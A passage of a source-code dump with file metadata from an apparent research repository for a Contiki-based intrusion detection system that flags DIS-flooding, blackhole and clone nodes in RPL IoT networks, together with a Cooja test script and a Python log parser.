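      process_poll(&wfradio_process);    /* wakes PROCESS_YIELD_UNTIL(... POLL) */
    }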
{
"alpha_fraction": 0.5537499785423279,
"alphanum_fraction": 0.5787500143051147,
"avg_line_length": 20.62162208557129,
"blob_id": "747c39ddef403173f306230649447a306d928dcd",
"content_id": "5705bc42a2bb40dafbf99bfd78a5fa99def7c45d",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 800,
"license_type": "permissive",
"max_line_length": 86,
"num_lines": 37,
"path": "/arch/platform/whitefield/command_storing_mop.c",
"repo_name": "philok93/IoTIDS",
"src_encoding": "UTF-8",
"text": "#define\t_COMMAND_SM_MOP_C_\n\n#include \"command.h\"\n\n#if !RPL_WITH_NON_STORING\n\nint get_route_list(FILE *fp, char *buf, int buflen)\n{\n\tuip_ds6_route_t *r;\n\tchar ipstr[128], nhop[128];\n\tint n=0, wr_comma=0;\n\n\tfor(r = uip_ds6_route_head();\n\t\t\tr != NULL;\n\t\t\tr = uip_ds6_route_next(r)) {\n\t\tuip_ipaddr_to_str(&r->ipaddr, ipstr, sizeof(ipstr));\n\t\tuip_ipaddr_to_str(uip_ds6_route_nexthop(r), nhop, sizeof(nhop));\n\t\tif(wr_comma) {\n\t\t\tADD2BUF(fp, \",\");\n\t\t}\n wr_comma=1;\n\t\tADD2BUF(fp, \"{ \\\"prefix\\\": \\\"%s\\\", \\\"pref_len\\\": \\\"%d\\\", \\\"next_hop\\\": \\\"%s\\\" }\\n\", \n\t\t\tipstr, r->length, nhop);\n\t\tif(n > buflen-100) {\n\t\t\tn += snprintf(buf+n, buflen-n, \"[TRUNC]\");\n\t\t\tbreak;\n\t\t}\n\t}\n\treturn n;\n}\n\nint cmd_rtsize(uint16_t id, char *buf, int buflen)\n{\n\treturn snprintf(buf, buflen, \"%d\", uip_sr_num_nodes());\n}\n\n#endif\n"
},
{
"alpha_fraction": 0.5547306537628174,
"alphanum_fraction": 0.5711326003074646,
"avg_line_length": 28.105527877807617,
"blob_id": "801d50bc0663c02c0a2443f9387f82209fbbddef",
"content_id": "89cb7f3970305025f06b36c39250b4a5e0957052",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 5792,
"license_type": "permissive",
"max_line_length": 137,
"num_lines": 199,
"path": "/examples/rpl-udp/udp-client-ids.c",
"repo_name": "philok93/IoTIDS",
"src_encoding": "UTF-8",
"text": "#include \"contiki.h\"\n#include \"net/routing/routing.h\"\n#include \"random.h\"\n#include \"net/netstack.h\"\n#include \"net/ipv6/simple-udp.h\"\n\n// #include \"packetbuf.h\"\n#include \"net/routing/rpl-lite/rpl.h\"\n#include \"net/routing/rpl-lite/rpl-icmp6.h\"\n#include \"sys/log.h\"\n\n#include \"ids.h\"\n#define LOG_MODULE \"IDS\"\n#define LOG_LEVEL LOG_LEVEL_INFO\n\n#define WITH_SERVER_REPLY 1\n#define UDP_CLIENT_PORT\t8765\n#define UDP_SERVER_PORT\t5678\n\n#define SEND_INTERVAL\t\t (60 * CLOCK_SECOND)\n\nstatic struct simple_udp_connection udp_conn;\n\n static struct ctimer time_to_reset;\n static void reset_stats(void *ptr);\n// static struct etimer time_sniff;\n\n/*---------------------------------------------------------------------------*/\nPROCESS(udp_client_process, \"IDS client\");\nAUTOSTART_PROCESSES(&udp_client_process);\n/*---------------------------------------------------------------------------*/\nstatic void\nudp_rx_callback(struct simple_udp_connection *c,\n const uip_ipaddr_t *sender_addr,\n uint16_t sender_port,\n const uip_ipaddr_t *receiver_addr,\n uint16_t receiver_port,\n const uint8_t *data,\n uint16_t datalen)\n{\n\n LOG_INFO(\"Received response '%.*s' from \", datalen, (char *) data);\n LOG_INFO_6ADDR(sender_addr);\n#if LLSEC802154_CONF_ENABLED\n LOG_INFO_(\" LLSEC LV:%d\", uipbuf_get_attr(UIPBUF_ATTR_LLSEC_LEVEL));\n#endif\n LOG_INFO_(\"\\n\");\n\n}\n\nstatic void reset_stats(void *ptr){\n uint8_t i=0;\n for (i=0;i<NODES_NUM_CL;i++){\n nodes[i].address=0;\n nodes[i].counterMsg=0;\n nodes[i].counterDIS=0;\n nodes[i].intervals=999;\n nodes[i].timestamp=0;\n nodes[i].spoof_suspicious=0;\n nodes[i].last_avg_rss=0;\n }\n \n LOG_INFO(\"RST tmp\\n\");\n // while (i<NODES_NUM_CL){\n \n // // if (tmp_ip_senders[i]!=0){\n // // LOG_INFO(\"Clone %d\\n\",tmp_ip_senders[i]);\n // // }\n // tmp_ip_senders[i].from=0;\n // for (i=0;i<tmp_ip_senders[i].index;i++){\n // // tmp_ip_senders[i].dest[i]=0;\n // tmp_ip_senders[i].count_fw_packets[i]=0; \n // }\n\n // i++;\n \n // }\n // ids_output_to_benign();\n\n ctimer_reset(&time_to_reset);\n}\n\nstatic void reset_nbr_tbl(){\n struct fw_stats *stats;\n stats = nbr_table_head(nbr_fw_stats);\n while(stats != NULL) {\n nbr_table_remove(nbr_fw_stats, stats);\n stats = nbr_table_next(nbr_fw_stats, stats);\n }\n}\n\n/*---------------------------------------------------------------------------*/\nPROCESS_THREAD(udp_client_process, ev, data)\n{\n static struct etimer periodic_timer;\n static unsigned count;\n // static char str[32];\n uip_ipaddr_t dest_ipaddr;\n static unsigned i=0;\n // extern fw_stats tmp_ip_senders[NODES_NUM_CL];\n\n PROCESS_BEGIN();\n\n// //Initialize array with nodes\n// uint8_t i=0;\n// for (i=0;i<30;i++){\n// nodes[i].address=0;\n// nodes[i].counterMsg=0;\n// nodes[i].counterDIS=0;\n// nodes[i].intervals=999;\n// nodes[i].timestamp=0;\n// }\n\n // radio_value_t radio_rx_mode;\n\n //Uncomment below to reduce dupl packets\n// radio_value_t radio_rx_mode;\n/* Entering promiscuous mode so that the radio accepts all frames */\n// NETSTACK_RADIO.get_value(RADIO_PARAM_RX_MODE, &radio_rx_mode);\n// LOG_INFO(\"val:%d\",radio_rx_mode);\n// NETSTACK_RADIO.set_value(RADIO_PARAM_RX_MODE, radio_rx_mode &(~RADIO_RX_MODE_AUTOACK));\n// if (NETSTACK_RADIO.set_value(RADIO_PARAM_RX_MODE, ~RADIO_RX_MODE_ADDRESS_FILTER | ~RADIO_RX_MODE_AUTOACK) != RADIO_RESULT_OK){\n// LOG_INFO(\"Error enable promiscious\\n\");\n// }\n// radio_rx_mode &= ~RADIO_RX_MODE_ADDRESS_FILTER;\n\n// NETSTACK_RADIO.set_value(RADIO_PARAM_RX_MODE, 
radio_rx_mode);\n /* Entering promiscuous mode so that the radio accepts the enhanced ACK */\n\n /* Initialize UDP connection */\n simple_udp_register(&udp_conn, UDP_CLIENT_PORT, NULL,\n UDP_SERVER_PORT, udp_rx_callback);\n\n //Used in uip6.c, starts detecting after 1 minute\n etimer_set(&time_sniff, (60*CLOCK_SECOND));\n etimer_set(&periodic_timer, (60*CLOCK_SECOND)); \n\n // etimer_set(&packet_fw_timer, (60*CLOCK_SECOND)); //send metrics to nodes\n ctimer_set(&time_to_reset,180*CLOCK_SECOND,reset_stats,NULL);\n\n // nbr_table_register(nbr_fw_stats, NULL);\n\ni=0;\n while(1) {\n // PROCESS_YIELD();\n // PROCESS_WAIT_EVENT();\n\n // if (etimer_expired(&packet_fw_timer)){\n // ids_output_to_benign(&dest_ipaddr);\n // etimer_set(&packet_fw_timer,60*CLOCK_SECOND);\n // // goto drop;\n // }\n\n PROCESS_WAIT_EVENT_UNTIL(etimer_expired(&periodic_timer));\n \n \n etimer_reset(&periodic_timer);\n\n if (NETSTACK_ROUTING.node_is_reachable() && NETSTACK_ROUTING.node_has_joined() && NETSTACK_ROUTING.get_root_ipaddr(&dest_ipaddr)) {\n // NETSTACK_ROUTING.get_root_ipaddr(&dest_ipaddr);\n /* Send to DAG root */\n LOG_INFO(\"Check IDS.Attempt: %u \\n\", count);\n \n if (i%3==0){ //3 minute report\n // i=0;\n LOG_INFO(\"fromids\\n\");\n ids_output_to_benign(&dest_ipaddr);\n if (i%15==0 || i%16==0){ //reset every 15 minutes\n reset_nbr_tbl();\n i=0;\n }\n }\n // LOG_INFO_6ADDR(&dest_ipaddr);\n // LOG_INFO_(\"\\n\");\n // snprintf(str, sizeof(str), \"hello %d\", count);\n // simple_udp_sendto(&udp_conn, str, strlen(str), &dest_ipaddr);\n // uip_ipaddr_t addr2;\n \n dest_ipaddr.u8[sizeof(dest_ipaddr.u8) - 1]=1;\n ids_output(&dest_ipaddr);\n\n count++; \n \n \n } else {\n LOG_INFO(\"Not reachable yet\\n\");\n }\n\n i+=1;\n \n\n /* Add some jitter */\n // etimer_set(&periodic_timer, SEND_INTERVAL\n // - CLOCK_SECOND + (random_rand() % (2 * CLOCK_SECOND)));\n }\n\n PROCESS_END();\n}\n/*---------------------------------------------------------------------------*/\n"
},
{
"alpha_fraction": 0.4828967750072479,
"alphanum_fraction": 0.4989214241504669,
"avg_line_length": 25.598360061645508,
"blob_id": "e32ff14c807db8bee423719c9d834304c25805b5",
"content_id": "5e5ca249661e70610c7ac594242e76cf4abf32fa",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 3245,
"license_type": "permissive",
"max_line_length": 137,
"num_lines": 122,
"path": "/os/net/routing/ids-app/ids.c",
"repo_name": "philok93/IoTIDS",
"src_encoding": "UTF-8",
"text": "\n//#include \"net/rpl/rpl-icmp6.c\"\n\n#include \"ids.h\"\n#include \"sys/log.h\"\n\n//void ids_output(uip_ipaddr_t *addr);\n\n// #if IDS_SERVER\n// #define NODES_NUM 5\n// #elif IDS_CLIENT\n// #define NODES_NUM_CL 30\n// #endifs\n\n#if IDS_SERVER == 1\nids_ctr_t nodes[NODES_NUM];\n\n#define LOG_MODULE \"IDS\"\n#define LOG_LEVEL LOG_LEVEL_INFO\n\nvoid checkNodes();\n// PROCESS(ids_process, \"Chk\");\n\nvoid checkNodes()\n{\n uint8_t j = 0;\n for (j = 0; j < NODES_NUM; j++) {\n // LOG_INFO(\"Running IDS %d %d\\n\",j,nodes[j].address);\n\n if (nodes[j].address > 0 && nodes[j].address != 1) {\n\n LOG_INFO(\"adr:%d %u disnum:%u %u t_in:%u bh:%d\\n\", j, (unsigned)nodes[j].address,\n (unsigned)nodes[j].counterDIS, (unsigned)nodes[j].counterMsg, (unsigned)nodes[j].intervals, nodes[j].blackhole_mal);\n\n //Check for BH nodes and reset\n if (nodes[j].blackhole_mal>2){\n LOG_INFO(\"BH Attacker:%d,%d\\n\", (unsigned)nodes[j].address,nodes[j].blackhole_mal);\n nodes[j].blackhole_mal=0;\n }\n\n //Changed the time interval\n if (nodes[j].intervals <= 20 && nodes[j].counterDIS >= 5) {\n uint8_t count = 0, c = 0;\n for (c = 0; c < DETECTORS_NUM; c++) {\n \n count += nodes[j].counterDetect[c];\n }\n // LOG_INFO(\"c:%d %d\\n\",count,nodes[j].detected);\n\n if (count >= 2 && nodes[j].detected == 1) {\n LOG_INFO(\"sure mal ID %u!\\n\", (unsigned)nodes[j].address);\n\n uint8_t k = 0;\n\n for (k = 0; k < DETECTORS_NUM; k++) {\n // nodes[j].counterDetect[k]=0;\n nodes[j].fromNode[k].u8[sizeof(nodes[j].fromNode[k].u8) - 1] = 0;\n }\n }\n\n nodes[j].detected = 1;\n LOG_INFO(\"warning!ID mal %u!\\n\", (unsigned)nodes[j].address);\n // nodes[j].address=0;\n nodes[j].counterDIS = 0;\n nodes[j].counterMsg = 0;\n nodes[j].intervals = 999;\n }\n\n } else\n nodes[j].detected = 0;\n }\n\n //ctimer_reset(&mytimer);\n}\n\n#endif\n\n// #if IDS_SERVER || IDS_CLIENT\n\n// static void\n// callback_nbr_entry_removal(uip_ds6_nbr_entry_t *nbr_entry)\n// {\n// uip_ds6_nbr_t *nbr;\n// uip_ds6_nbr_t *next_nbr;\n// if(nbr_entry == NULL) {\n// return;\n// }\n// for(nbr = (uip_ds6_nbr_t *)list_head(nbr_entry->uip_ds6_nbrs);\n// nbr != NULL;\n// nbr = next_nbr) {\n// next_nbr = (uip_ds6_nbr_t *)list_item_next(nbr);\n// free_uip_ds6_nbr(nbr);\n// }\n// }\n\n// #endif /* UIP_DS6_NBR_MULTI_IPV6_ADDRS */\n// PROCESS_THREAD(ids_process, ev, data)\n// {\n\n// static struct etimer mytimer;\n\n// PROCESS_BEGIN();\n\n// uint8_t i=0;\n// for (i=0;i<NODES_NUM;i++){\n// nodes[i].address=0;\n// }\n\n// // if(period == NULL) {\n// // PROCESS_EXIT();\n// //}\n\n// while(1) {\n// etimer_set(&mytimer, 5*CLOCK_SECOND);\n// PROCESS_WAIT_EVENT_UNTIL(etimer_expired(&mytimer));\n// //etimer_reset(&mytimer);\n// checkNodes();\n// //PROCESS_WAIT_UNTIL(etimer_expired(&periodic));\n// //checkNodes();\n// }\n\n// PROCESS_END();\n// }"
},
{
"alpha_fraction": 0.5965714454650879,
"alphanum_fraction": 0.6102856993675232,
"avg_line_length": 18.44444465637207,
"blob_id": "3b43a0392b2931ead896f5d662d0ad6d69605eaf",
"content_id": "c6f48a57cbd3dfad8e3dbf61359cebce3e6777a9",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 875,
"license_type": "permissive",
"max_line_length": 72,
"num_lines": 45,
"path": "/tools/cooja/Testing/RUN_REPEATED.sh",
"repo_name": "philok93/IoTIDS",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\n# Usage\nif [ $# -eq 2 ]; then\n REPEATS=$1\n TEST=$2\nelse\n echo \"Usage: $0 <nr_repeats> <test>\"\n echo \"Example: $0 10 cooja_helloworld\"\n exit 1\nfi\n\n# Locate Contiki/COOJA\nif [ -z \"$CONTIKI\" ]; then\n if [ -z \"$CONTIKI_HOME\" ]; then\n \tCONTIKI_HOME=../../..\n fi\n CONTIKI=$CONTIKI_HOME\nfi\n\n# Clean up\nrm -f *.cooja_log\nrm -fr se obj_cooja\nrm -f symbols.c symbols.h\n\n# Compile COOJA\necho \">>>>>>> Building COOJA <<<<<<<<\"\n(cd $CONTIKI/tools/cooja && ant clean && ant jar)\nif [ \"$?\" != \"0\" ]; then\n echo \"Compilation of COOJA failed\"\n exit 1\nfi\n\n# Run tests\nfor COUNTER in `seq 1 $REPEATS`;\ndo\n echo \">>>>>>> Test $COUNTER/$REPEATS: $TEST-$COUNTER.log <<<<<<<<\"\n bash RUN_TEST.sh $TEST RUN_REPEATED_LAST.log\n mv $TEST.log $TEST-$COUNTER.log\ndone\n\necho\ncat RUN_REPEATED_LAST.log\necho\necho \">>>>>>> DONE! Test logs stored in $TEST-[1-$REPEATS].log <<<<<<<<\"\n"
},
{
"alpha_fraction": 0.4541984796524048,
"alphanum_fraction": 0.4893675148487091,
"avg_line_length": 20.710060119628906,
"blob_id": "80c416598d29d1ee8b3208b7a2c2e3a5388ad95b",
"content_id": "313bb3b1f40d600794303aa74539359d9bc77ccc",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3668,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 169,
"path": "/tools/cooja/Testing/clone_test/readDetector.py",
"repo_name": "philok93/IoTIDS",
"src_encoding": "UTF-8",
"text": "import datetime\n\ndef readFiles():\n\t\n\tsumavg=[]\n\tkk=1\n\tfor kk in range(1,11):\n\n\t\twith open(\"result\"+str(kk)+\".txt\",\"w\") as f1:\n\n\t\t\tmal=0\n\t\t\t#for u in range(1,4):\n\t\t\t\t\n\t\t\tmals=[]\n\t\t\tcounters=[]\n\t\t\tcount=0\n\t\t\ttot=0\n\t\t\tavg=[]\n\t\t\t\n\t\t\t#for each run\n\t\t\tfor i in range(1,6):\n\t\t\t\tfile1=\"read_IDS_allnodes_sciptIDS\"+str(kk)+\"-clone-\"+str(i)+\".log\"\n\t\t\t\tcount=0\n\t\t\t\tmals=[]\n\t\t\t\tcounters=[]\n\t\t\t\ttot=0\n\t\t\t\tfp1=[]\n\t\t\t\tsure_nodes={}\n\t\t\t\tcount_sure=0\n\t\t\t\tcount_time=0\n\t\t\t\tclone={}\n\n\t\t\t\twith open(file1,\"r\") as f:\n\t\t\t\t\tfor line in f:\n\t\t\t\t\t\t#if (line.find(\"ID malicious\")!=-1):\n\t\t\t\t\t\t\t#print (line)\n\t\t\t\t\t\tif (line.find(\"attacker\")!=-1):\n\t\t\t\t\t\t\tx1=line.split()\n\t\t\t\t\t\t\tnode=int(x1[6].split(\":\")[1])\n\t\t\t\t\t\t\tif (node not in clone):\n\t\t\t\t\t\t\t\tclone[node]=1\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tclone[node]=clone[node]+1\n\t\t\t\t\t\tif (line.find(\"chkns\")!=-1):\n\t\t\t\t\t\t\t#print(line)\n\t\t\t\t\t\t\tx1=line.split()\n\t\t\t\t\t\t\tif \"IPde\" in x1[5]:\n\t\t\t\t\t\t\t\tnode=int(x1[9].split(\":\")[1])\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tnode=int(x1[5].split(\":\")[1])\n\t\t\t\t\t\t\t# if (file1==\"read_IDS_allnodes_scipt52-3.log\" and node==6):\n\t\t\t\t\t\t\t# \tprint(line,node)\n\t\t\t\t\t\t\t#fp1.append(node)\n\t\t\t\t\t\tif (line.find(\"Maybe\")!=-1):\t\n\t\t\t\t\t\t\tx1=line.split()\n\t\t\t\t\t\t\tnode=int(x1[6].split(\":\")[1])\n\t\t\t\t\t\t\t# print(x1[0])\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t# exit(0)\n\t\t\t\t\t\t\tfor i in range(0,len(fp1)):\n\t\t\t\t\t\t\t\t#if file1.find(\"testwith4mals\")!=-1:\n\t\t\t\t\t\t\t\t#\tprint (i,mals[i],node,counters[i])\n\t\t\t\t\t\t\t\t\t#print (line)\n\t\t\t\t\t\t\t\tif fp1[i]==node:\n\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t#print(\"added:\",node,count,mals)\n\t\t\t\t\t\t\t\t# print(x1,node)\n\t\t\t\t\t\t\t\tfp1.append(int(node))\n\t\t\t\t\t\t\t\t#mal=node\n\t\t\t\t\t\tif (line.find(\"warning\")!=-1):\n\t\t\t\t\t\t\ttot+=1\n\t\t\t\t\t\t\tx=line.split()\n\t\t\t\t\t\t\t# print(x)\n\t\t\t\t\t\t\t#print (x)\n\t\t\t\t\t\t\tnode=int(x[7].split(\"!\")[0])\n\t\t\t\t\t\t\t#print (node)\n\t\t\t\t\t\t\tfor i in range(0,len(mals)):\n\t\t\t\t\t\t\t\t#if file1.find(\"testwith4mals\")!=-1:\n\t\t\t\t\t\t\t\t#\tprint (i,mals[i],node,counters[i])\n\t\t\t\t\t\t\t\t\t#print (line)\n\t\t\t\t\t\t\t\tif mals[i]==node:\n\t\t\t\t\t\t\t\t\tcounters[i]+=1\n\t\t\t\t\t\t\t\t\t#print (mals)\n\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t#print(\"added:\",node,count,mals)\n\t\t\t\t\t\t\t\tmals.append(int(node))\n\t\t\t\t\t\t\t\tcount+=1\n\t\t\t\t\t\t\t\tcounters.append(count)\n\t\t\t\t\t\t\t\tcount=0\n\t\t\t\t\t\t\t\t#mal=node\n\n\t\t\t\t\t\tif (line.find(\"sure mal\")!=-1):\n\t\t\t\t\t\t\tx=line.split()\n\t\t\t\t\t\t\t# print(x)\n\t\t\t\t\t\t\t# exit(0)\n\t\t\t\t\t\t\tnode=int(x[8].split(\"!\")[0])\n\t\t\t\t\t\t\tsec=(int(x[0])/(1000000.0))\n\t\t\t\t\t\t\tminutes=(int(x[0])/(1000000.0*60))%60.0\n\t\t\t\t\t\t\tminutes = float(minutes)\n\t\t\t\t\t\t\tprint(x,sec,minutes)\n\t\t\t\t\t\t\ta=str(datetime.timedelta(seconds=sec))\n\t\t\t\t\t\t\tprint(a)\n\t\t\t\t\t\t\tif minutes:\n\t\t\t\t\t\t\t\tcount_time+=1\n\t\t\t\t\t\t\tsure_nodes[node]=node\n\t\t\t\t\t\t\tcount_sure+=1\n\n\t\t\t\t\t\tif line.find(\"Test ended\")!=-1:\n\t\t\t\t\t\t\tprint(\"DONE GOOD\",line)\n\n\t\t\t\n\t\t\t\tprint 
(\"*\"*30,\"\\n\",file1,tot)\n\t\t\t\tf1.write(\"\\nFile:\"+file1+\"\\n\")\n\t\t\t\ta=0\n\t\t\t\tprint(\"final:\",count_time)\n\t\t\t\t\n\t\t\t\tf1.write(\"SURE NODES:\")\n\t\t\t\tfor x,y in sure_nodes.items():\n\t\t\t\t\tf1.write(str(x))\n\t\t\t\t\tf1.write(\", \")\n\t\t\t\tf1.write(\"\\n\")\n\t\t\t\tf1.write(\"sure count:%s\\n\" % str(count_sure))\n\n\t\t\t\tfor x,y in clone.items():\n\t\t\t\t\tf1.write(\"Clone nodes:\"+ str(x)+\" count:\"+str(y)+\"\\n\")\n\t\t\t\tf1.write(\"\\n\")\n\n\n\t\t\t\tfor x in mals:\n\t\t\t\t\tprint (\" malicious:\",x,\"Count:\",(counters[a]))\n\t\t\t\t\tf1.write(\"Malicious id:\")\n\t\t\t\t\tf1.write(str(x))\n\t\t\t\t\tf1.write(\" \"+str(counters[a])+\"\\n\")\n\t\t\t\t\ta+=1\n\t\t\t\tavg.append(float(tot))\n\n\t\t\t\tfor f in fp1:\n\t\t\t\t\tf1.write(\"FP id:\")\n\t\t\t\t\tf1.write(str(f))\n\t\t\t\t\tf1.write(\"\\n\")\n\n\t\t\t\t\n\t\t\t#Average for 10 repetitions\n\t\t\t#print(\"len\",len(avg),avg)\n\t\t\tsumavg.append(sum(avg)/len(avg))\n\t\t\t#print (len(sumavg),sumavg)\n\t\t\tc=0\n\t\t\tfor i in avg:\n\t\t\t\t#print (i)\n\t\t\t\tc+=1\n\t\t\t\tf1.write(\"Total in \"+str(c)+\": \"+str(i)+\"\\n\")\n\t\t\n\t\t\tc=0\n\t\t\tfor k in sumavg:\n\t\t\t\t#print (i)\n\t\t\t\tc+=1\n\t\t\t\tf1.write(\"AVG \"+str(c)+\": \"+str(k)+\"\\n\")\n\n\n\n\n\n\n\n\nreadFiles()"
},
{
"alpha_fraction": 0.5969935655593872,
"alphanum_fraction": 0.6102362275123596,
"avg_line_length": 24.642202377319336,
"blob_id": "f10fead2a1cbfb93720fb196edd91bc14cf38a4a",
"content_id": "29fb36861e836cbcdb8b98d5a4eedadc5ba3ce2b",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 2794,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 109,
"path": "/examples/rpl-udp/project-conf.h",
"repo_name": "philok93/IoTIDS",
"src_encoding": "UTF-8",
"text": "#ifndef IDS_CLIENT\n#define IDS_CLIENT 0\n#pragma message \"undefined ids client\"\n#endif\n\n#ifndef IDS_SERVER\n#define IDS_SERVER 0\n#pragma message \"undefined ids server\"\n#endif\n\n#ifndef RPL_SERVER\n#define RPL_SERVER 0\n#endif\n\n#ifndef MALICIOUS\n#define MALICIOUS 0\n#endif\n\n#ifndef MAL_RANK\n#define MAL_RANK 0\n#endif\n\n#ifndef MAL_DIS\n#define MAL_DIS 0\n#endif\n\n#ifndef MAL_EXT\n#define MAL_EXT 0\n#endif\n\n#ifndef MAL_BLACKHOLE\n#define MAL_BLACKHOLE 0\n#endif\n\n#ifndef CLONE_ATTACK\n#define CLONE_ATTACK 0\n#endif\n\n#ifndef IDS_OF\n#define IDS_OF 0\n#endif\n\n\n\n#ifdef DEBUG\n#undef DEBUG\n#define DEBUG 1\n#endif\n\n// #undef LOG_CONF_LEVEL_RPL\n// #undef LOG_CONF_LEVEL_6LOWPAN\n// #define LOG_CONF_LEVEL_RPL LOG_LEVEL_DBG\n// #define LOG_CONF_LEVEL_IPV6 LOG_LEVEL_WARN\n// #define LOG_CONF_LEVEL_6LOWPAN LOG_LEVEL_NONE\n// #define LOG_CONF_LEVEL_TCPIP LOG_LEVEL_NONE\n// #define LOG_CONF_LEVEL_MAC LOG_LEVEL_DBG\n// #define LOG_CONF_LEVEL_MAIN LOG_LEVEL_INFO\n// #define LOG_CONF_LEVEL_IDS LOG_LEVEL_INFO\n\n#define LOG_CONF_LEVEL_IPV6 LOG_LEVEL_DBG\n#define LOG_CONF_LEVEL_RPL LOG_LEVEL_DBG\n#define LOG_CONF_LEVEL_6LOWPAN LOG_LEVEL_NONE\n#define LOG_CONF_LEVEL_TCPIP LOG_LEVEL_NONE\n#define LOG_CONF_LEVEL_MAC LOG_LEVEL_INFO\n#define LOG_CONF_LEVEL_FRAMER LOG_LEVEL_NONE\n#define LOG_CONF_LEVEL_COAP LOG_LEVEL_NONE\n#define LOG_CONF_LEVEL_LWM2M LOG_LEVEL_NONE\n#define LOG_CONF_LEVEL_6TOP LOG_LEVEL_NONE\n#define LOG_CONF_LEVEL_MAIN LOG_LEVEL_INFO\n\n#if IDS_OF || IDS_CLIENT\n/* configure network size and density */\n#undef NETSTACK_MAX_ROUTE_ENTRIES\n#define UIP_CONF_MAX_ROUTES 15\n#define NETSTACK_MAX_ROUTE_ENTRIES 15\n\n#undef NBR_TABLE_CONF_MAX_NEIGHBORS\n#define NBR_TABLE_CONF_MAX_NEIGHBORS 15\n#endif /* NETSTACK_MAX_ROUTE_ENTRIES */\n\n\n\n//------My IDS conf--------\n\n// #if !IDS_SERVER\n// #undef NETSTACK_CONF_MAC\n// // #ifndef NETSTACK_CONF_MAC\n// #define NETSTACK_CONF_MAC\tcsma_driver //csma_driver nullmac_driver\n// // #endif\n// #endif\n\n//#ifdef IDS_CLIENT\n//#undef CC2420_CONF_AUTOACK\n//#define CC2420_CONF_AUTOACK 0\n//#endif\n\n// #endif\n// #ifdef RADIO_RX_MODE_ADDRESS_FILTER\n// #undef RADIO_RX_MODE_ADDRESS_FILTER\n// #define RADIO_RX_MODE_ADDRESS_FILTER (0 << 0)\n// #endif\n// #endif\n\n// #ifdef IDS_SERVER\n// #undef NBR_TABLE_CONF_MAX_NEIGHBORS\n// #define NBR_TABLE_CONF_MAX_NEIGHBORS 7\n// #undef UIP_CONF_MAX_ROUTES\n// #define UIP_CONF_MAX_ROUTES 7\n// #endif"
},
{
"alpha_fraction": 0.5812612175941467,
"alphanum_fraction": 0.5993634462356567,
"avg_line_length": 32.28807830810547,
"blob_id": "2bc2d89d37ba4325a922cbe1ae896f8529034f74",
"content_id": "0455bf0e6761fa369fcb596c984b4efae6819d59",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 10054,
"license_type": "permissive",
"max_line_length": 125,
"num_lines": 302,
"path": "/arch/platform/whitefield/command.c",
"repo_name": "philok93/IoTIDS",
"src_encoding": "UTF-8",
"text": "#define\t_COMMAND_C_\n\n#include \"command.h\"\n//#include \"udp-app.h\"\n#include \"rpl-dag-root.h\"\n#define DEBUG DEBUG_PRINT\n#include \"os/net/ipv6/uip-debug.h\"\n\nextern int gNodeID;\n\n#define NOT_IMPLEMENTED return snprintf(buf, buflen, \"NOT IMPLEMENTED\")\n\n//PROCESS_NAME(udp_client_process);\nint cmd_start_udp(uint16_t id, char *buf, int buflen)\n{\n NOT_IMPLEMENTED;\n#if 0\n /* Just stsrt the periodic timer to send UDP traffic */\n int n=0;\n //process_start(&udp_client_process, NULL);\n start_udp_process();\n ADD2BUF(NULL, \"UDP Client Sucess\");\n return n;\n#endif\n}\n\n/*\nappstat->totalpktsent = seq_id;\n appstat->totalpktrecvd = g_pktstat.rcvcnt;\n appstat->totalduppkt = g_pktstat.dupcnt;\n appstat->minroudtriptime = g_pktstat.leastLatency;\n appstat->maxroundtriptime = g_pktstat.maxLatency;\n\n*/\nint cmd_get_udpapp_stat(uint16_t id, char *buf, int buflen)\n{\n NOT_IMPLEMENTED;\n#if 0\n udpapp_stat_t appstat;\n int n = 0;\n\n int isroot = rpl_dag_root_is_root();\n\n udp_get_app_stat(&appstat);\n if (isroot){\n ADD2BUF(NULL, \"\\t\\\"Total PKT Sent 2 BR\\\": \\\"%u\\\",\\n\", appstat.totalpktsent);\n ADD2BUF(NULL, \"\\t\\\"Total PKT Recvd by BR\\\": \\\"%u\\\",\\n\", appstat.totalpktrecvd);\n ADD2BUF(NULL, \"\\t\\\"Total PKT Dropped\\\": \\\"%u\\\",\\n\", (appstat.totalpktsent - appstat.totalpktrecvd));\n ADD2BUF(NULL, \"\\t\\\"Total Dup PKT RCVD by BR\\\": \\\"%u\\\",\\n\", appstat.totalduppkt);\n if (appstat.totalpktrecvd){\n ADD2BUF(NULL, \"\\t\\\"PDR for upward direction\\\": \\\"%.2f\\\",\\n\", (float)appstat.totalpktrecvd/(float)appstat.totalpktsent);\n }\n }\n else{\n ADD2BUF(NULL, \"\\t\\\"Node:\\\" \\\"%d\\\",\\n\",gNodeID);\n ADD2BUF(NULL, \"\\t\\\"Total REQ Sent\\\": \\\"%u\\\",\\n\", appstat.totalpktsent);\n\n ADD2BUF(NULL, \"\\t\\\"Total RSP Recvd\\\": \\\"%u\\\",\\n\", appstat.totalpktrecvd);\n ADD2BUF(NULL, \"\\t\\\"Total RSP Dropped\\\": \\\"%u\\\",\\n\", (appstat.totalpktsent - appstat.totalpktrecvd));\n ADD2BUF(NULL, \"\\t\\\"Total Dup RSP RCVD\\\": \\\"%u\\\",\\n\", appstat.totalduppkt);\n if (appstat.totalpktrecvd){\n ADD2BUF(NULL, \"\\t\\\"PDR for upward direction\\\": \\\"%.2f\\\",\\n\", 